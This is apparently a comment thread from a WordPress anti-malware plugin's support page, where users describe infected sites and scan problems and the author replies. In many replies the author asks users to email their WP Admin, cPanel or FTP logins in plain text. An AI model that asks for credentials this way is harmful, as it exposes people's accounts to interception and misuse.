  • On July 28, 2014 at 9:25 pm, Seyyah Çelebi said:

    Hi my friend, i am writing from Turkiye, my all sites hacked 7 months ago, and then my host suspended all my sites several times, i deleted all infected files, but i couldnt prevent.But one day i thought is there any plugin for malware, so i found your plugin and used.This is awsome, it protects me malwares, and i passed all virus check or security check sites, my site is clean, i am very appreciate.I will write an article in my native language, and i will say everybody to use this plugin.Thank you my friend, you saved my labors.Thank you very much, if one day you wanna come Turkiye, pls send me message…

    Reply
  • On May 18, 2014 at 1:12 am, Graham said:

    Hi Eli,
    Been using your plugin on my sites for some time now, and have donated in the past. All my sites with Bluehost are currently down. I’ve been told it’s likely to be malware. Is there any way of using your plugin through cPanel as I don’t have access to wp-admin?

    Reply
    • On May 18, 2014 at 6:17 am, Anti-Malware Admin said:

      Unfortunately you will need at least one site on the server to have a working WP Admin so you can run my plugin. If you can get your main site working I can get my plugin to scan all the site at once. If you need help getting a site working you can email me directly with your cPanel login and I’ll see what I can do.

      Reply
  • On April 7, 2014 at 8:12 am, Bastien said:

    Great plugin which help me to save a lot of time ! Cheers from France.

    Reply
  • On March 5, 2014 at 7:07 pm, Ian R. Wilson said:

    Fantastic plug-in! Spent hours trying to track down the malware on my customers site. stumbled across this tool. BAMB!!! All taken care of. Will donate soon! Thank you!!!!!

    Reply
  • On February 2, 2014 at 12:59 pm, Piotr Wilkin said:

    Thought you might want to know – on a virtual server that I ran the plugin on it had problems scanning the root directory – probably due to an empty path after splitting on __file__. Adding

    if (empty($dir)) $dir = “/”;

    after line 583 fixed the problem for me.

    Reply
    • On February 3, 2014 at 1:59 am, Anti-Malware Admin said:

      Thanks for this bug report!

      I can see how your addition would quiet the error you were getting but I am more concerned with the circumstances that produce an empty $dir array. I don’t see how you could have my plugin installed in a lower directory the WordPress itself (even on a virtual server). How does __FILE__ resolve to a path that is less than 3 directories deep?

      I would love to gain a more thorough understanding of what factors produce this result on your server so that I can release a plugin update that comprehensively addresses this issue. Would you be willing to grant me WP Admin access to your site so that I can debug this issue first-hand?

      Please get back to me either way to let me know if you are willing to assist any further with this issue. Thanks :-)

      Reply
  • On January 21, 2014 at 9:32 am, Mike H said:

    This plugin is amazing and you have my thanks for creating it!

    I’ve done a couple of scans successfully, but ran into one issue. A quick scan keeps occurring when viewing the scan section. It keeps automatically scanning, therefore preventing me from doing a full scan. Not sure why. I even uninstalled it + reinstalled it to see if I could get it to stop, but it’s permanently scanning and failing (reports that it can’t complete because of lack of memory).

    Reply
    • On January 22, 2014 at 6:03 am, Anti-Malware Admin said:

      The Quick Scan is meant to run automatically when you choose it off the menu directly, but it’s only good for small selections of files on a server that has enough memory for a single PHP process to scan them all. If you want to run the Complete Scan you can do that from the Scan Settings page. There you can adjust all the scan settings and then choose which type of scan to run (Quick or Complete).

      If you still have trouble just let me how I can help.

      Reply
  • On January 16, 2014 at 5:32 am, Joy said:

    Hi Eli:

    I am coming across a bug in one of my sites (in the header) that is not being caught via a scan:

    <?php
    #b8da75#
    if(empty($gcsf)) {
    $gcsf = "”;
    echo $gcsf;
    }

    #/b8da75#
    ?>

    Thought you would like to know.

    Aloha, Joy

    Reply
    • On January 16, 2014 at 7:31 am, Anti-Malware Admin said:

      The code you have here innocuous and will have no impact on your sites performance or security. I was likely part of a bug that my plugin removed and you should be able to remove without adverse side-effects but it’s not necessary.

      Reply
  • On January 9, 2014 at 2:51 pm, chris jones said:

    I cannot say how thankful I am to Eli and his plugin. Simply the best support I have ever received from any company. I posted a support question and he literally emailed me in 30 mins and helped me through the issue. Amazing !! We cleaned 2 entire sites with Malware and saved me a ton of $.

    I have since then implemented the plugin on a number of my sites.

    Reply
  • On December 30, 2013 at 3:09 am, Flashpoint Miniatures said:

    Howdy , this is a great tool !

    I am having trouble with a trojan (Trojan.JS.Iframe) in the footer of my wordpress site/blog. I have the updated version of your program and have run the complete scan for wp-content AND for plugins , and am not finding the file being flagged that I think I should be finding. (ie; a woothemes file)

    I have also been running wordfence scans which give the all-clear.
    Sucuri is also giving me the all clear .

    ….. but http://support.clean-mx.de/clean-mx/viruses.php?response=alive&email=abuse@ozservers.com.au&limit=195
    ….still identifies the trojan as active.

    what to do next ?

    Thankyou in advance.
    Jimmi

    Reply
    • On December 30, 2013 at 3:33 am, Anti-Malware Admin said:

      It looks to me like your site is clean. Did you remove the iframe?

      I think that clean-mx site is checking email viruses that may still be circulating but not active on your site. Is there anything to indicate that your site is still showing these iframes?

      If you have reason to believe you still have an active malicious iframe embeded on your site then you can send me your WP Admin login and a will take a look at it for you.

      Aloha, Eli

      Reply
  • On December 2, 2013 at 9:29 pm, Will Chapman said:

    Eli

    I just upgraded to the latest version and on starting a complete scan I get the following:

    Fatal error: Allowed memory size of 67108864 bytes exhausted (tried to allocate 524829 bytes) in /home/waterway/public_html/wp-content/plugins/gotmls/images/index.php on line 393

    CHeers

    Will

    Reply
    • On December 3, 2013 at 10:25 am, Anti-Malware Admin said:

      Hey, thanks for sending me your login credentials.

      The problem here is that you have a php.ini file in your wp-admin directory with the memory_limit directive set to “64M”. I tried overriding this setting with the ini_set function in PHP and by using “php_value memory_limit 256M” in your .htaccess file but neither method will work on your server. I cannot change the php.ini file directly because it is owned by “root”, but maybe you can gain write access to this file and raise the memory_limit directive to “256M”?

      Let me know if there is anything else I can do.

      Reply
  • On October 6, 2013 at 12:46 am, Pete Lauder said:

    Hi Eli, I have been trying to login to my site for a few weeks now, and keep getting a loop on entry, leaving an error, although logged in, all dashboard access is denied.

    The site is up, and after attempting to access the dashboard, the live site shows the admin bar.

    I have noticed that one of my GOTMLS quarantined files is a php file that is full of login commands, and wonder if this has any bearing on my problem.

    I do not know how to manually restore the file, so perhaps you could take a look for me.

    On a side note, have you any plans to release a standalone version for html sites?

    Reply
    • On October 6, 2013 at 1:18 am, Anti-Malware Admin said:

      First, what is the error left by the looping when you try to login?

      Second, I am right in assuming that, after this attempt to login that will show the admin bar on the live site, that you can use the admin bar to access the dashboard successfully?

      Third, I’m not sure I understand what you mean by “a php file full of login commands” in the quarantine. can you send me this PHP file so I give you a better answer on that?

      If you want me to take a look at this you can send me a WP Admin login to your site and I’ll login later today to check it out.

      As for that side note, I do plan to write a wrapper for my plugin that would enable it to run without a WordPress install.

      Reply
      • On October 6, 2013 at 3:46 am, Pete Lauder said:

        The error on chrome is; Error code: ERR_TOO_MANY_REDIRECTS

        Secondly, no, although the admin bar is there, attempting to enter the dashboard results in a 404 error.

        I’m sending you the login, and the ftp access to take a look at the file, I’m no php coder, but the page does seem centered around logging in to WP, and may be from one of my security plugins.

        And that is really great news about writing the wrapper for the plugin, it is much needed.

        Reply
        • On October 6, 2013 at 9:02 pm, Anti-Malware Admin said:

          Thanks for getting me the FTP login info. I was able to figure out what was blocking you from your wp-admin pages. It wasn’t my plugin, or even any of the other plugins that was interfering with the wp-admin folder. There was actually a custom php.ini file in the wp-admin directory that was using directives like ‘magic_quotes_gpc’ and ‘allow_call_time_pass_reference’ which are no longer supported in the version of PHP you now have on your server. I just rem’d out those two lines and your wp-admin folder became accessible again.

          Let me know if there is anything else I can do for you. It would also be great to get a big fat donation from you for all that work ;-) and that would help me get to work on improvements for my plugin (like that non-WP wrapper you need).

          Reply
          • On October 7, 2013 at 6:26 am, Pete said:

            Thats my second donation in as many day’s, Eli is such a gent, as you can see, he fixed my site when it was unrelated to GOTMLS.

            You really can’t beat that!

            I must now review the plugin on my plugin site, and see how to squeeze an extra star in for service.

            Thanks Eli

  • On October 4, 2013 at 4:43 pm, Will Chapman said:

    Eli

    I have run a scan and everything is clean except for a notation in the scan report that there were 15 read/write errors. What is the significance of this?

    Regards

    Will

    Reply
    • On October 6, 2013 at 1:00 am, Anti-Malware Admin said:

      Read/Write errors can be caused by abnormal file permission, zero byte file size, or files that are too big to match in a regular expression. It’s hard to say, without seeing the files, if they are a threat to you. Hackers are known to make their files non-readable so as to escape detection but there are always lots of benign reason for read errors too. You should first try to download the files via FTP and look at the file contents with a text editor to see if you can tell if they are safe. You can also use any good FTP client to check that the file permission right. Feel free to send me any files you are not sure of.

      Reply
  • On September 29, 2013 at 9:27 pm, John said:

    Your software is no longer showing up on my wp….I try to reinstall and it fails because it says it’s already there…any suggestions?

    Reply
  • On August 13, 2013 at 10:33 am, Dr. Shefali Dandekar said:

    my website does not contain any malware buy google chrome / firefox always shows warning :(

    Reply
    • On August 13, 2013 at 11:04 am, Anti-Malware Admin said:

      I don’t see any malware on there either but I see the warnings from Google. Do you have a Webmaster Tools account with Google? You should check for specific malware warnings in the health section of your Google Webmaster Tools account.

      Reply
      • On August 13, 2013 at 9:50 pm, Dr. Shefali Dandekar said:

        yes i already send review my website request to google

        Reply
        • On August 14, 2013 at 5:19 am, Anti-Malware Admin said:

          To request a review is a good way to resolve this but if there are still “infected” URLs on your site Google will not lift the warnings. On that same Malware page in the Health section of your Webmaster Tools there should be a list of URLs on your site that Google found to contain malware and when it was detected. This may indicate that you have a conditional redirect or some malicious links that only show themselves to the search engine. If this is the case, and my plugin has not found this threat on your site, then you can give me your WP Admin login and I will track down the source of this infection for you.

          You can email login info directly to me: eli AT gotmls DOT net

          Reply
  • On August 9, 2013 at 5:01 am, Dejo said:

    I ran the scan and it found a few items which it quarantined. But when I add my web address in a Facebook post, I see spam in the description so there must be something still wrong. Can you check it out? There are a few potential threats also. Thanks!

    Reply
    • On September 19, 2013 at 9:52 pm, Anti-Malware Admin said:

      First let me say that I am really sorry fro not replying sooner. I completely missed the notification of your post.

      I am guessing that this was a cache issue and it just took a little while for the facebook post to refresh with your cleaned up content. If you are still having any issue though please contact me directly and I’ll see what I can do.

      Reply
  • On August 2, 2013 at 1:15 pm, Rosie said:

    Eli,
    I love your plugin. I’ve used it on another of sites. However, when I tried running it on this website, it does not run. Also, when I click on Eli’s Blog
    Anti-Malware, AVG blocks it and it says it found a virus JS/Phish. Do you have any suggestions on why it won’t run?

    Reply
    • On August 3, 2013 at 3:05 pm, Anti-Malware Admin said:

      It sounds like your site is infected and maybe it is embedding infections in the links too.

      I would be happy to check it out for you if you want to send me your WP Admin login.

      You can email you password directly to me if you want: eli AT gotmls DOT net

      Reply
  • On July 20, 2013 at 8:54 am, Evan Huang said:

    Hi, how does the “Plugin Updates for WP 3.5.2″ section in the top right corner of AM settings differ from normal wordpress plugin updating?

    The one on the settings screen just seems to keep searching for no reason, and I just installed this plugin today.

    Reply
    • On July 20, 2013 at 10:02 am, Anti-Malware Admin said:

      The Plugin Update section on the Anti-Malware Settings page checks the changelog on my site for updates. It displays the changes in those updates if any are available so you can see what’s in the next release. It displays this information independent of the WP repository or the WP Cron job that is supposed to let you know when any plugin updates are available.

      Reply
  • On June 23, 2013 at 8:24 am, Gokhan Ayyildiz said:

    Thanks

    Reply
  • On June 21, 2013 at 6:29 pm, Anti-Malware Admin said:

    You’re welcome!

    What is not clear? Do you still have malicious code on your site?
    If you want to send me your WP Admin credentials for your site, you can email the login directly to: eli at gotmls dot net

    Sorry, I don’t speak Russian :(

    Reply
  • On May 29, 2013 at 3:07 pm, Will Chapman said:

    Eli

    I’ve been seeing examples of malware on all sorts of sites (even on big sites) that puts a doube-line under some words thus inbiting one to click (you can see examples on the front page of http://alrewascanalfestival.org) when one clicks you get taken to an innocuous-looking website that runs an ad or survey – clicking through may be a point of infection?

    Anyway looking at the code on my webpage it has been hacked to read apprenticeship. Is this one that GoMLS can repair?

    Regards

    Will

    Reply
    • On May 29, 2013 at 3:35 pm, Anti-Malware Admin said:

      You are seeing these link on various websites because your browser is infected not the sites themselves. If I look at the same sites I don’t see the infection but you will see these malicious site even on sites that are clean. It is an Add-On/Extension that is installed into your browser that is embedding these link that you see.

      Try running Malwarebytes or a good anti-virus on your computer. You could also try uninstalling the adware from the Programs in the Control Panel if you know what to look for.

      Reply
  • On May 25, 2013 at 6:37 am, Will Chapman said:

    Dear Eli

    I continue to be very impressed with your plugin and I thought the following minor cosmetic observations might be helpful:

    1. This doesn’t always happen but sometimes the start of a full scan 609 folders were found – about 60% through the scan, that increased to 899 folders. At the end of the scan 893 folders had been selected and 899 scanned.

    2. Normally the original estimated time to complete the scan was several given as 1-2 hours. As the scan proceeded, this changed to about an hour. On one recent occasion midway through the scan time elapsed changed to 22824335 minutes and time remaing to 17700505 minutes. As the scan proceeded, I noticed that only the last two digits of time scanned were changing at appeared to be the accurate number of minutes whereas time remaining had no apparent pattern and changed wildly.
    At the completion (100%) of the scan time taken was 22824357 minutes versus an actual 57 minutes. Time remaining was -9139898 seconds and -6 folders remained.
    3. The list of possible infections seemed to be concentrated in wp-content (plugins and themes] and I wondered whether only active plugins and the current theme were scanned [to save time] and, as such whether it was worthwhile to delete inactive plugins (and themes).
    The other folder taking up a lot of time was wp-include and as most (if not all) of this WP core code would it be safe for us to exclude wp-include as a target for scanning?
    4. Another plugin I use – not as good as yours! – flags a couple of WP core files as not matching the current WP version and when I check them I notice that they contain GoMLS code. Would it be practical to place this code in a non-core file like theme/functions.php (which I understand can be used for bits of code that won’t be overwritten by theme & WP updates)?
    5. I have 6 websites all running from subfolders of a main domain. This creates a problem when I want to scan the main domain (waterwaywatch.org) because GoMLS offers three radio button options I have the choice of public_html (all subdomains which is tempting because it would check all domains but takes several hours) or wp-content (plugins & themes but not wp-admin or wp-includes?) or plugins (not much different to wp-content?) – could we have a multi-choice option of wp-admin, wp-content and wp-include?

    Best regards

    Will

    Reply
    • On May 26, 2013 at 9:12 pm, Anti-Malware Admin said:

      These are all great points. I will give you a reply to each numbered accordingly:
      1. This happens sometimes because of errors during the scan where folders were not read on the fist attempt are re-scanned, thereby increasing the overall scanned folders count. Some folders that are skipped or could not be read will sometimes throw off the total count.
      2. I have only seen this happen when a second scan is started before the first scan finishes, throwing off the start time and thus the calculated time to completion. This could also be due to a system time update during the scan process.
      3. Potential threats are a real gray area. I am working on improving the white-list, which will take care of most of these. It is extremely important to scan all files, not only active plugins and the current theme, because the threats are sometimes included or linked elsewhere and are therefore still active even if the plugin is deactivated. However it would be worthwhile to delete inactive plugins and themes, and un-needed backups (and any other un-necesary files) to save time when scanning. It is also just as important to scan wp-include and all WP core files because it is very common for these files to be infected. Therefore it would not be safe to exclude any directory from the scan.
      4. If it is the wp-login.php file that is flagged as not matching the current WP version then yes, it should contain GOTMLS code. It would not be practical to place this code in any other file because it has to load before the WP bootstrap to prevent DOS for brute-force attacks on the login page.
      5. As well as the three radio button options you also do have the multi-choice option of scanning only the wp-admin, wp-content and wp-include under public_html. Just click the linked “public_html” and select only the folder you want to scan.

      I hope this helps. Please feel free to write me back with any more questions.

      Reply
  • On May 24, 2013 at 7:52 am, Jeff Rafael said:

    Hello,

    I’m using the latest definitions, I run quick scan it goes to about 61% and stops. It says there are 2 backdoor scripts. I run fix, it says its cleaned but it doesn’t remove them when i scan again, nor does it quarantine them. I also run a complete scan and it gets stuck at 99%, tries to re-scan but nothing happens. Below are the scripts it finds over and over again and does not remove them. Please help! Thank you.

    /home/biotcoup/public_html/wp-content/cache/object/000000/3ca/c4f/3cac4fcbc57b63046e84988bf6ccfede.php
    /home/biotcoup/public_html/wp-content/cache/object/000000/5de/1b3/5de1b35463eb632e87a806c4d9def5bb.php

    Reply
    • On May 24, 2013 at 9:52 am, Anti-Malware Admin said:

      Thanks for give me the login to your site. It looks like it actually is cleaning those files and putting them in the Quarantine. But because those are cache files, they are just being re-written by the w3-total-cache plugin. The folder it keeps getting stock in is /public_html/wp-content/cache/object/000000/b14, which is the directory that w3-total-cache is writing all the files to.

      I would strongly advise disabling all caching and deleting any stored cache files (at least while you try to scan and clean up your site). Caching is a direct hindrance to removing malware because the cache can preserve the malicious content even after the threat has been removed. You also need to look at changing your .htaccess file to completely disable caching.

      Please let me know if I can be of any further assistance.

      Reply
  • On May 22, 2013 at 7:53 pm, namor said:

    dear eli

    i get a exploit message with a freshly from wordpress uploaded wp-login.php. is this possible. what can i do?

    Found 1 WP-Login Exploit…

    greatings, namor

    Reply
    • On May 22, 2013 at 8:08 pm, Anti-Malware Admin said:

      I have received other inquiries as to why the wp-login.php file is flagged as a WP Login Exploit on every install of WordPress, even brand new installs of the most current version. This is simply because WordPress has no built-in brute-force protection and the login page is exploitable. It has been clearly demonstrated through the recent widespread attacks on WordPress login pages around the world that it is not only vulnerable to password cracks via brute-force but it has been shown to overload and bring down a whole server if the attacks are too numerous. That is why my patch prevents the loading of the WordPress bootstrap if a brute-force attack is detected so that your server’s resources are not tied up telling hackers if they guessed the right password or not.

      So basically, if my plugin finds that the first line of code in the wp-login.php file is loading the wp-load.php file without my protection before it then it flags it as a vulnerability. Applying my patch before this first line of code filters out this plague of attack so that they don’t even load WordPress and your server is free to serve the pages that your legitimate visitors are requesting.

      I hope this helps answer your questions about this new threat and my approach to solving it.

      Reply
  • On May 17, 2013 at 9:10 am, Damir Kropf said:

    I’m receiving alerts from Norton: “Web Attack: Mass Injection Website 5″

    I run complete Anti Malware (ver. 1.3.05.14) scan on my site and it didn’t find anything?

    Regards,
    Damir

    Reply
    • On May 17, 2013 at 10:20 am, Anti-Malware Admin said:

      This is a new threat that has not been added to my Definition Update yet. I can see the malicious iframes in the footer of your site. If you can send me the footer.php file from your theme then I will add this threat to my Definition Update so that it can be removed automatically.

      Reply
  • On May 15, 2013 at 3:40 pm, Rolando G said:

    Eli I have been dealing with malware for the last 2 weeks I have been flagged by google and now found your plugin! I have begun to scan and i ve found threats can you personally take a look at it! I will be more than happy to make a donation..I have 2 sites I think they have the same malware!!! THANKS

    Reply
    • On May 15, 2013 at 4:45 pm, Anti-Malware Admin said:

      Send me your WP Admin login and I’ll take a look.

      Reply
      • On May 16, 2013 at 8:52 am, Rolando G said:

        hello Eli any updates on my websites..Thanks and have a great day!

        Reply
        • On May 16, 2013 at 9:18 am, Anti-Malware Admin said:

          Sorry for the delay, it took a long time to scan one of the sites. I had to reset some of the scan setting and start the scan over, but both sites are clean and it looks like they are not even blacklisted any more (Google must have updated their cache already).

          Reply
  • On May 13, 2013 at 10:27 pm, Okoro David Osato said:

    hi, i just want to say thanks a lot to you guys. the slideshow at the top of this website gave me the tips i needed and i found the fr**king malware on my client’s website and deleted it. will download the plugin all the same and install it for (hopefully not) future use.

    Os@o.

    Reply
    • On May 14, 2013 at 11:35 am, Anti-Malware Admin said:

      When you install the plugin you should register it, download the current Definition Update, and run a Complete Scan to make sure there are no other threats, back-doors, or other vulnerabilities (and you should patch the wp-login.php file to protect against brute-force attacks).

      Reply
  • On May 3, 2013 at 3:00 pm, Elizabeth said:

    Hi,
    My client’s website seems to have been hacked. I have run the plugin, but I am not sure if I am doing it right as the malware seems to still be there. Please advise and I will donate money for your time and effort in a few. Thanks!

    Reply
    • On May 3, 2013 at 3:31 pm, Anti-Malware Admin said:

      I see there is an iframe still in the header. If you want to give me you WP Admin login I will remove that for you and add it to me definition updates.

      Reply
    • On May 3, 2013 at 5:30 pm, Anti-Malware Admin said:

      Thanks for sending me your login. I found and removed the iframes from the header and footer of your theme and your site is clean now. I also added this new variant to my definition updates so it can be automatically removed in the future.

      Reply
  • On April 29, 2013 at 7:27 am, agadir aeroport said:

    Hi Eli,
    In loving with ur plugin, i’d like if possible it detect the iframes in or out the HTML tag, like this :

    thanks a lot

    Reply
    • On April 29, 2013 at 7:49 am, Anti-Malware Admin said:

      The iframe example you tried to post did not come through. If you want to send me your WP Admin credentials I will login and find that malicious iframe for you and add it to me definition update so that it can be automatically removed.

      Reply
  • On April 26, 2013 at 4:36 pm, Wayne Dibble said:

    HI,
    As soon as I registered the plugin to download the latest threats my site is off line? Forced to deactivate to get my site back up – whats the issue, does anybody know?
    Wayne…

    Reply
    • On April 26, 2013 at 5:32 pm, Anti-Malware Admin said:

      I would like to help you troubleshoot this issue. These are strange symptoms you are describing. Can you confirm that your site goes off-line just by having my plugin enabled?

      Could you please also tell me what you see when your site is “off-line” (error message, blank white page, etc.)?

      Reply
  • On April 26, 2013 at 3:58 am, Michele said:

    hi and thank you for your plugin.

    I was wondering if you could give us a roadmap to the possibility to schedule an automatic-scan function. I read you are planning to add it in a future version?

    I would be more than happy to make a donation or pay for a “pro” version in order to have such a function in anti-malware.

    Thanks!

    Michele From Italy

    Reply
    • On April 26, 2013 at 7:18 am, Anti-Malware Admin said:

      Thanks for your interest. This feature is in the design stages now. There is one major update slated for next month, which is Automated Updates to the Definition. Then I will start testing the implementation of Scheduled Scans :D

      It’s just me on this project and I donate my to making it better and helping people with infections. Donations to me help me justify the time I spend making this plugin better, so fee free to donate ;-)

      I don’t think I’ll ever charge a fixed fee for this plugin, it has helped many people around the world that cannot pay, and I could never cut them off just because they don’t have the means to pay. I know this leaves the door open for a lot of people who could pay to not pay … but that’s their karma :P

      Reply
  • On April 23, 2013 at 4:55 am, RJ said:

    I made a donation so I could use your repair function, but I’m not sure how to make it repair the malware it found. It still keeps asking for a donation.

    Please help!

    Thanks,

    RJ

    Reply
    • On April 23, 2013 at 6:50 am, Anti-Malware Admin said:

      I got your donation, Thank you! It should reflect your donation amount in the sidebar and not pester you to donate any more (of course you’re always welcome to donate more whenever you want to ;-)

      Reply
  • On April 23, 2013 at 12:15 am, Johnathan Hurwitz said:

    I like this plug in. Is there a way to see what your auto fix actually changed so we can learn what to look for.

    I was getting hit by these and my comments are set to members only. Your system found one issue in the WP-Login.PhP is that how such fools were able to comment on my site without actually joining. Have no posts with such garbage only a few comments.

    louis vuitton bags sale (IP: 223.246.175.120 , 223.246.175.120)
    retro jordans (IP: 123.156.198.240 , 123.156.198.240)

    bEavWIHB (IP: 113.231.232.108 , 113.231.232.108)

    Thanks for your help

    Reply
    • On April 24, 2013 at 2:22 pm, Anti-Malware Admin said:

      Sorry for not replying right away. I have been swampted with this new wp-login.php vulnerability that has resently been exploited by a wide-spread brute-force attack. I have just finished fine-tuning my security patch for the WordPress login file and I am just now able to breath again and catch up on the regular stuff.

      If you click on the linked filename for any file that has been found to contain threats, you can see the contents of that file with a list of links at the top for each match found in that file. clicking on those links at the top will usually highlight the malicious/suspicious code.

      After you run the Automatic Repair you can click the linked file again and, if the file still exists, you will see the new contents (which should not have any malicious code).

      FYI – Comments are stored in the database and not yet scanned by this file scanner. You should look into comment security/spam plugins and maybe tighter database security to prevent this kind of thing.

      Reply
      • On April 24, 2013 at 2:54 pm, Johnathan Hurwitz said:

        Thanks for the reply. I understand your hard effort the wp-login.php has come up twice for me. I’m relatively new to WP and when I found comments with spam even though there was no new member I was really surprised

        I also learned when one is spammed in WP you need to move the file to the spam folder so the anti spam will learn and then block. I was deleting them all together and banning the IP of which is a near useless process. I have two spam plugins now, one for comments and the other for registrations.

        Keep up the great work and this attack is indeed an interesting one.

        Reply
  • On April 22, 2013 at 12:40 pm, debbie marconi said:

    Just spent the last half hour reading your comments Eli. You are heaven sent and plan to be a regular donor as well. Maybe sometime you can also look into the guts of my blog and see if we have all of our bases covered. Thanks again!

    Reply
  • On April 22, 2013 at 9:14 am, debbie marconi said:

    After running the scan, two of my files were quarantined and now I cannot log back into my site. I need help….NOW! I cannot find any place to contact you on this site other than here. Did I donate to a legit business?

    Reply
    • On April 22, 2013 at 12:25 pm, debbie marconi said:

      I had my problem resolved by Eli and in a most professional and timely manner! At this point, I highly recommend this plug-in. I wish Eli lived next door but he actually handled this problem like he was a neighbor already. Thanks Eli, you rock!

      Reply
  • On April 19, 2013 at 1:37 pm, Christy said:

    Hi! Thank you so much for your plugin! My site was recently hacked with malware. It seems that only Chrome is blocking access to my website. I tried to run the scan a few times, and it did not find anything. There was a long list of suspicious files, but I have no idea how to go about checking them. With the most recent update, I was able to find and delete a Login Exploit, but I’m not sure if that removed the malware.

    I’m also getting this message “Another Plugin or Theme is using ‘wpfbogp_callback’ to hadle output buffers.
    This prevents actively outputing the buffer on-the-fly and will severely degrade the performance of this (and many other) Plugins.
    Consider disabling caching and compression plugins (at least during the scanning process).” and I’m not sure which plugins are interfering.

    Is there any way you can help? It would be much appreciated, and I’d be happy to donate to your plugin. Thank you!

    Reply
    • On April 19, 2013 at 2:21 pm, Anti-Malware Admin said:

      You can find out why Google has blocked your site in the Health section of your Google Webmaster Tools account.
      You can also request a review there to clear that warning if the site is now clean.

      If you want me to check your site first and make sure it’s clean, I will need you to send me your WP Admin login. I can also check that wpfbogp_callback to see what plugin is doing that and why.

      Reply
    • On April 25, 2013 at 9:09 am, Anti-Malware Admin said:

      Are you still getting a warning in Chrome?

      I was able to run a Complete Scan and found that wpfbogp_callback in the wp-facebook-open-graph-protocol plugin. That is why the Quick Scan is not running so well.

      I don’t see any malware and Google says you’re clean too so maybe it’s just your browser cache.

      Reply
      • On April 25, 2013 at 9:50 am, Christy said:

        Thank you so much for your help, Eli. I’m not getting the warnings anymore, but I’ll have to check if other people still are. I’ll just assure my Facebook fans that my site is clean.

        Thank you,
        Christy

        Reply
  • On April 5, 2013 at 9:52 am, Jeff Rafael said:

    I ran the full scan after registering (I had not donated yet), it identified several threats and I clicked to repair… It said all was clean, but I checked with webmaster tools and it said I was still infected. What do I do now? Feel free to contact me to discuss further. thanks!

    Reply
    • On April 5, 2013 at 10:02 am, Anti-Malware Admin said:

      Did you request a review in Webmaster Tools?

      If Google still says you are infected after a review then what are the details of the infection?

      If you need more direct help you can email me your WP Admin login and I’ll look into it.

      Reply
  • On March 31, 2013 at 6:11 am, Steve Navazio said:

    Hey Eli,

    Thanks for a great plugin,

    Can you tell me how to use your plugin to check all of the WP installs on my server?

    Thanks in advance.

    Best Wishes,
    Steve Navazio

    Reply
    • On April 1, 2013 at 11:12 am, Anti-Malware Admin said:

      You can send me the login info for your main site and I will upgrade it to be able to scan the whole server.

      Reply
    • On April 18, 2013 at 10:30 am, Eli Scheetz said:

      Just following up. How did the scanning go on all those sites? I looked like it would take quite a while to scan all those files but did it work ok?

      Thanks for the donation too.

      Reply
  • On March 31, 2013 at 4:11 am, Susan said:

    I cannot find my key in the settings tab of WordPress. I see your plug in as “activated” but cannot find the key to register.
    thanks in advance for the assistance.

    Reply
    • On March 31, 2013 at 10:24 am, Anti-Malware Admin said:

      Just register from the form on the right hand side of the Anti-Malware Settings page in your admin.

      yoursite.com/wp-admin/admin.php?page=GOTMLS-settings

      Your key is already entered on that page. Just submit it, then go back to your admin and refresh the Anti-Malware Settings page and you can then download the definition updates.

      Reply
  • On March 28, 2013 at 1:56 pm, Roger H. said:

    Great plugin and it takes care of most of my issues but I’m still getting the malware alert on http://sitecheck.sucuri.net after running your plugin and cleaning everything it finds up.

    any help would be appreciated..

    Roger

    Reply
    • On March 30, 2013 at 4:31 pm, Anti-Malware Admin said:

      I think you are actually clean. If you look at the details of that “malware” that sucuri is finding on cheflou.com you will see that it is just an iframe in the footer that is supposed to load some content from your site (hawksviralmarketing.com). Is that not something you have engineered? (It doesn’t show anything anyway).

      I’m guessing this is just a false positive from sucuri.net

      If you do need to remove it, the code is in the Theme’s footer.php file, and the iframe content is loaded from the wp_options with the option_name of either ‘revchurch_abcode’ or ‘revchurch_subtit’.

      Reply
  • On March 25, 2013 at 12:52 pm, Xochi said:

    Greetings Eli,

    I have reinstalled WP to the latest version. Gotten rid of all plugins, and then fresh installed only one that I use. Anti-malware says there are not problems but when I asked for review from Google, I still get a message that there is a script embedded.
    URLs Type Last checked
    http://www.dobbinsfamily.net/?cat=4 Code Injection 3/25/13
    http://www.dobbinsfamily.net/?cat=5 Code Injection 3/5/13
    Please advise.
    Xochi

    Reply
    • On March 25, 2013 at 1:11 pm, Anti-Malware Admin said:

      I just look at that URL and saw that there is actually still some malware in the header. I have added this threat to my definition so that it can also be automatically repaired.

      Please try and download the new definitions and run the scan again. It should then be able to remove this new threat. After that you can request another review of your site in Webmaster Tools.

      Reply
  • On March 21, 2013 at 9:33 pm, Rolf Joho said:

    Hi Eli,

    I like your plugin, but I have one question: How can I find out which “Another Plugin or Theme is using ‘nxs_ogtgCallback’ to hadle output buffers” so I can it disabling?

    Thanks for you help.
    Rolf

    Reply
  • On March 19, 2013 at 7:19 am, Cameron said:

    Hey, I have a nasty bit of malware which Sucuri defines as MW:SPAM:SEO. I found an old post where you resolve this issue for a user and I’m just wondering if your scanner can get rid of it yet?

    If not, would you like to take a look inside my website to see what wonders you can find?

    I would like to give you a donation if you can help me out.

    Reply
  • On March 15, 2013 at 9:40 pm, Patrik Fältström said:

    I have three questions that I can not find answers for on your site…maybe my click skills fails me…

    1. Do the plugin scan the content of the database?

    2. Do the plugin handle multisite setup (where for example each blog have one wp_post table each)?

    3. I see in the comments you have noticed a person that have issues with things similar to pharma drive by issues where for example google bots get different results (with the scam) while others do not. Have you included checks for such things (yet)?

    Regards, Patrik

    Reply
    • On March 16, 2013 at 9:23 am, Anti-Malware Admin said:

      My plugin does not scan the database yet but it could be made to do so. It specialises in finding and removing malicious CODE from the files on the server (single site, multisite, even non-WordPress sites). Because my plugin scans UN-compiled code from the back-end it does not need to detect the user-agent specific code designed for crawlers like googlebot. I have seen my plugin detect malicious code when other scanners (like sucuri) fail to detect anything on the front-end of the site. I can also detect back-doors and security holes that cannot be found by crawling the indexed pages of the site from the outside.

      Of course nothing is going to protect you 100% from any attack. My plugin takes an approach unlike other security plugins and it has proven to be a very useful tool for getting/staying clean. I will continue to support it and improve it to keep it up to speed with the newest threats and security holes as they are discovered.

      Reply
  • On March 3, 2013 at 11:15 pm, Stefaan Pauwels said:

    Just donated, plugin works amazingly well: got rid of all the malware when other plugins and my own attempts only weeded out a portion of the problems. Got unblocked by Google within 48 hours of running the scan and automated fixes.

    Annoyingly, Google keeps giving the old (malware-infected) results, though: as you can see here: http://knotoryus.com/knot.png. Any idea of this goes away by itself or do I need to take further action?

    Thanks again for all the help!

    Stefaan
    KNOTORYUS.com

    Reply
    • On March 4, 2013 at 8:36 am, Anti-Malware Admin said:

